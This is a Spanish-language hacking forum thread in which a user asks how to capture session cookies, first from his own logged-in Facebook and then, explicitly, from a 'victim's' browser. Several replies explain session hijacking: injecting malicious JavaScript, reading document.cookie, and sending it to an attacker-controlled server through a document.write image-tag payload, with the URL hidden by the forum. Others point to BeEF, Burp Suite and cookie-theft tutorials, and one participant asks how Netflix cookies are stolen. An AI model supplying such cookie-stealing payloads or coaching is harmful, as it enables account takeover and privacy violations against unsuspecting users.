[SOLUCIONADO] Como capturar cookies de sesión.

Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.

No sé si me explico.

Saludos.

Se puede desde el navegador colega, o creo con beef puedes capturar

Enviado desde mi SM-G928T mediante Tapatalk

burp suite, te lo facilita tambien y un borrado en el propio navegador

Si quieres obtener la cookie solo tienes que ejecutar una línea de javascript

var cookie = document.cookie

Luego con eso ya puedes imaginarte la de miles de cosas que puedes hacer, solo es pensar

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.

No sé si me explico.

Saludos.

Pasate por aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias por leer!
DUDA

Hola!

Antes que nada te recomiendo el taller de seguridad web (al menos el número #1) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta dónde se trata el tema del robo de cookies mediante javascript.

Llegados a este punto y puesto a que en tu caso tienes acceso directo al pc, es bastante simple y puedes utilizar cualquier método de los que hay en la siguiente lista:

• Utilizar una extensión del navegador, donde simplemente deberás buscarla y coger lo que necesites. Puedes utilizar cualquiera de estas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
• Como ya han comentado, puedes utilizar BurpSuite, interceptar la petición (o mirando el historial del proxy) y coger las cookies.
• También puedes acceder a la consola del navegador, (Control + Shift + I), ir a la pestaña Network, realizar cualquier petición y consultar la cookie.
• O como última opción (ya comentada), entrar a la consola, (Control + Shift + I), ir a la pestaña Console, y ejecutar "document.cookie"

Espero haberte ayudado,

Un saludo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.

No sé si me explico.

Saludos.

para ver la cookie abris la consola de chrome y escribis document.cookie

para borrarla, muchas veces alcanza con desloguearte de la web. Si no, abris la consola y pones document.cookie=''
Eso ultimo no lo probé, pero creo que funciona

Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.

Lo primero que tienes que entender es que javascript es un lenguaje de lado del cliente, es decir, se ejecuta en tu navegador. Tu objetivo sería hacerte con la cookie de tu víctima, ya sea usando alguna herramienta anteriormente mencionada o inyectando tu un simple js malicioso y haciendo que tu víctima lo ejecute en su navegador. Después cogerías tu sesión y cambiarías la cookie a la de tu víctima para gozar de sus mismos privilegios, es decir si tu victima tiene una cuenta llamada Pepito, si utilizas su cookie pasarías a estar logeado en la cuenta Pepito sin necesidad de poner la contraseña

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.

Lo primero que tienes que entender es que javascript es un lenguaje de lado del cliente, es decir, se ejecuta en tu navegador. Tu objetivo sería hacerte con la cookie de tu víctima, ya sea usando alguna herramienta anteriormente mencionada o inyectando tu un simple js malicioso y haciendo que tu víctima lo ejecute en su navegador. Después cogerías tu sesión y cambiarías la cookie a la de tu víctima para gozar de sus mismos privilegios, es decir si tu victima tiene una cuenta llamada Pepito, si utilizas su cookie pasarías a estar logeado en la cuenta Pepito sin necesidad de poner la contraseña

Y sabes de algún js ya montado para este menester
?

O más o menos como montarlo. Estoy pegado en esto de la programación como bien sabes 

Pues con lo que te he respondido antes podrías hacerte una idea. Con document.cookie te devuelve el valor de la cookie, solo tienes que enviarlo desde el navegador de la victima a algun lugar controlado por ti para almacenar la cookie.
En google hay cientos de miles de ejemplos, no es necesario perder tiempo reinventando la rueda.
Con hacer una petición post con el valor de la cookie a un servidor tuyo basta. Por ejemplo

document.write('<img src="No tienes permitido ver los links. Registrarse o Entrar a mi cuenta>')

Esta es una de las técnicas más típicas, sabiendo un poco de javascript solo es cuestión de pensar y ser creativo ^^

Ejecuta el

document.cookie

como te están diciendo en la consola.

Me estaba preguntando si se podía hacer un programa maligno que te extraiga las cookies de un navegador, he visto que publican muchas cookies de usuarios de Netflix para ver Netflix gratis, cómo las robarán??

Acá te dejo un taller completo que habla sobre como capturar cookies

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos,
ANTRAX